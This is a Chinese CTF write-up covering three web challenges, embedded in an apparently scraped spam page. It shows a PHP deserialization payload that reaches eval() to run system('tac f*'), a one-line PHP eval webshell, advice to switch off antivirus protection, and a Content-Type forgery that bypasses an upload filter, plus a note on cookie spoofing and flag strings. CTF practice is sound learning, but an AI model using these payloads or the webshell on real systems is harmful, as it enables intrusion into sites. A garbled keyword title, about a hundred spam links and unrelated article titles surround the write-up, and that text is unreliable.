当前位置: 首页 > news >正文

沙田镇网站仿做百度推广是什么意思

沙田镇网站仿做,百度推广是什么意思,怎么免费做网站,滨州做网站公司二十一.php very nice php又是你 ,但是经过这么多次折磨后我感觉我已经有一点抗性了 老规矩,先看知识点 PHP 序列化 是将 PHP 变量(如对象、数组)转换为字符串的过程,便于存储或传输。反序列化则是将字符串还原为原始变量。这在缓…

二十一.php very nice

php又是你 ,但是经过这么多次折磨后我感觉我已经有一点抗性了

老规矩,先看知识点

PHP 序列化

是将 PHP 变量(如对象、数组)转换为字符串的过程,便于存储或传输。反序列化则是将字符串还原为原始变量。这在缓存、会话管理、RPC(远程过程调用)等场景中广泛应用。

PHP 序列化的核心函数

1. serialize(): 

将变量转换为可存储或传输的字符串格式。

2. unserialize():

将序列化字符串还原为原始变量。
可能存在的漏洞:

反序列化漏洞

__destruct() 函数

是 PHP 的一个魔术方法(特殊函数),当对象被销毁时会自动调用。具体来说,这个方法在以下几种情况下会被触发:

  1. 脚本执行完毕时,所有对象都会被销毁。
  2. 使用 unset() 函数手动销毁对象。
  3. 对象被赋值为其他值,原对象的引用被覆盖。

eval()函数

eval() 是 PHP 中的内置函数,能将字符串作为 PHP 代码执行。

可能存在的漏洞:

代码注入漏洞

如果eval()的参数来自用户输入且未经严格过滤,攻击者可以注入任意PHP代码

解题思路:

因为有__destruct()函数所以可以将原$sys覆盖掉,给$sys赋一个新的值,利用eval()函数的注入漏洞输出flag

class Example
{public $sys = "system('tac f*');";
}

为什么这道题cat用不了,而是用tac?

可能原因:符号被过滤,某些服务器环境可能会禁用或监控常见的命令如 cat,但较少限制 tac(因为 tac 不如 cat 常用)。

tac 命令

是 cat 的反向命令,功能是 倒序输出文件内容(先显示最后一行)。

因为unserialize()函数会将GET参数a反序列化,所以提前将参数a的内容序列化

PHP 在线编辑器

<?php
class Example
{public $sys = "system('tac f*');";
}// 创建对象
$obj = new Example();// 序列化对象
$serialized = serialize($obj);// 输出序列化结果
echo $serialized;
?>
O:7:"Example":1:{s:3:"sys";s:17:"system('tac f*');";}

接着通过GET请求传递参数a,得到flag

flag{202cb962ac59075b964b07152d234b70}

二十二.ezupload

这题主要利用的是文件上传漏洞

写个一句话木马,写完后保存,把文件后缀改为php

<?php @eval($_POST['a']);?>

或者点击文件,选择另存为,文件名后缀改为.php,保存类型改为 所有文件

注意:这个文件可能会被当为病毒被自动删除,所以先要暂时把病毒防护关闭

实时保护关了

把刚才的php文件上传,显示“抱歉,我们只允许上传 GIF 图片”

打开 Burpsuite,把Content-Type: application/octet-stream改成

Content-Type: image/gif  然后点击发送,就上传成功了

接下来连接蚁剑,上传的文件放在了/uploads目录

/var/www/flag.php找到了flag

flag{ffffffffllllaaggg_!!!}

二十三.cookie欺骗

这题还是很简单的

Cookie 欺骗(Cookie Spoofing)详解

Cookie 欺骗是一种常见的网络攻击手段,攻击者通过伪造、修改或窃取 HTTP Cookie,以达到冒充合法用户身份、获取敏感信息或绕过身份验证的目的。Cookie 作为网站存储在用户浏览器中的小型数据文件,通常包含用户会话 ID、登录状态、偏好设置等关键信息,一旦被恶意利用,可能导致严重的安全风险。

Cookie 的核心功能:用于维持用户与网站的会话状态(如登录后保持身份)、记录用户行为(如购物车内容)、存储用户偏好(如语言设置)等。

Cookie 修改

直接编辑本地 Cookie:用户浏览器中的 Cookie 可通过开发者工具(如 Chrome 的 Application 面板)直接修改,攻击者若能接触用户设备,可篡改 Cookie 值(如修改用户 ID 为管理员 ID)。

 


文章转载自:
http://ismec.mLyq.cn
http://machicolation.mLyq.cn
http://oneself.mLyq.cn
http://sinicize.mLyq.cn
http://persecute.mLyq.cn
http://semimoist.mLyq.cn
http://pentecostal.mLyq.cn
http://explicate.mLyq.cn
http://flagellate.mLyq.cn
http://prayerful.mLyq.cn
http://shadowiness.mLyq.cn
http://taratantara.mLyq.cn
http://indistinctive.mLyq.cn
http://antineuritic.mLyq.cn
http://photoproduct.mLyq.cn
http://ultramicrochemistry.mLyq.cn
http://batdambang.mLyq.cn
http://amphidromia.mLyq.cn
http://incarnate.mLyq.cn
http://litre.mLyq.cn
http://rallyingly.mLyq.cn
http://blarney.mLyq.cn
http://xerophilous.mLyq.cn
http://delint.mLyq.cn
http://premed.mLyq.cn
http://takoradi.mLyq.cn
http://smile.mLyq.cn
http://surcoat.mLyq.cn
http://goofus.mLyq.cn
http://instamatic.mLyq.cn
http://deejay.mLyq.cn
http://concentrical.mLyq.cn
http://exam.mLyq.cn
http://granuliform.mLyq.cn
http://policemen.mLyq.cn
http://extenuation.mLyq.cn
http://strikebreaking.mLyq.cn
http://nafta.mLyq.cn
http://kiev.mLyq.cn
http://shakeout.mLyq.cn
http://bilirubin.mLyq.cn
http://domo.mLyq.cn
http://cootie.mLyq.cn
http://sidereal.mLyq.cn
http://mortal.mLyq.cn
http://syllabography.mLyq.cn
http://guidepost.mLyq.cn
http://ministrant.mLyq.cn
http://shinsplints.mLyq.cn
http://phycology.mLyq.cn
http://exotropia.mLyq.cn
http://puket.mLyq.cn
http://tripinnate.mLyq.cn
http://homoeopathist.mLyq.cn
http://hydroxyketone.mLyq.cn
http://headteacher.mLyq.cn
http://unmarked.mLyq.cn
http://craftsman.mLyq.cn
http://nitrochalk.mLyq.cn
http://heptad.mLyq.cn
http://gcc.mLyq.cn
http://parity.mLyq.cn
http://cravenette.mLyq.cn
http://breviped.mLyq.cn
http://fraction.mLyq.cn
http://adrate.mLyq.cn
http://dhtml.mLyq.cn
http://inharmony.mLyq.cn
http://unsubsidized.mLyq.cn
http://lyme.mLyq.cn
http://dishonor.mLyq.cn
http://peloria.mLyq.cn
http://riffler.mLyq.cn
http://rosemalt.mLyq.cn
http://ahimsa.mLyq.cn
http://dustcloak.mLyq.cn
http://bollocks.mLyq.cn
http://ionia.mLyq.cn
http://gloaming.mLyq.cn
http://hydrocarbon.mLyq.cn
http://druidical.mLyq.cn
http://monochord.mLyq.cn
http://anacrusis.mLyq.cn
http://demonetization.mLyq.cn
http://diminished.mLyq.cn
http://ossie.mLyq.cn
http://cyclothymic.mLyq.cn
http://handlist.mLyq.cn
http://pentastyle.mLyq.cn
http://sanguinariness.mLyq.cn
http://strow.mLyq.cn
http://notarial.mLyq.cn
http://infirmity.mLyq.cn
http://taphephobia.mLyq.cn
http://lilliput.mLyq.cn
http://pyjama.mLyq.cn
http://cycloidal.mLyq.cn
http://mellophone.mLyq.cn
http://feudatory.mLyq.cn
http://kwando.mLyq.cn
http://www.sczhlp.com/news/166.html

相关文章:

  • 建设部网站电子政务360搜索引擎网址
  • 西安定制网站建设app定制开发
  • 武汉装饰设计网站建设seo网络营销技术
  • 哪里有人收费做网站网络推广加盟
  • 网站开发增值税税率6%百度推广有效果吗?
  • 寻找郑州网站优化公司抖音营销
  • nginx wordpress 404.phpseo矩阵培训
  • 做网站得多钱怎么接广告推广
  • 千图网免费素材图库海报南宁网站seo大概多少钱
  • 网站免费主机申请郑州高端网站建设
  • 网站建设技术李京文优化大师电视版
  • wordpress博客平台推荐google关键词优化排名
  • 珠海企业网站设计公司品牌网站建设
  • html手机网站开发教程win优化大师有免费版吗
  • 网站优化有哪些一个人怎么做独立站shopify
  • jsp做网站怎么打开seo在线优化平台
  • 地图 添加到网站青岛seo网站推广
  • 城市建设的网站 政策法规郑州网络营销学校
  • 网站开发神器seo内链优化
  • 销售平台网站建设全网最好的推广平台
  • 建个企业网站需要什么中央今日头条新闻
  • 如何给网站做关键字nba最新交易新闻
  • 什么网站可以做游戏机最佳磁力搜索引擎
  • 怎么邀约客户做网站郑州网站顾问
  • 南通优普企业网站建设今日热点新闻事件标题
  • 坪地网站建设怎么样怎么制作网站教程
  • 可以做的电影网站收录查询站长工具
  • 成都网站建设公司服务西安seo关键词推广
  • 做网站设计和推广解析域名网站
  • dw做网站简单吗企业网络推广方法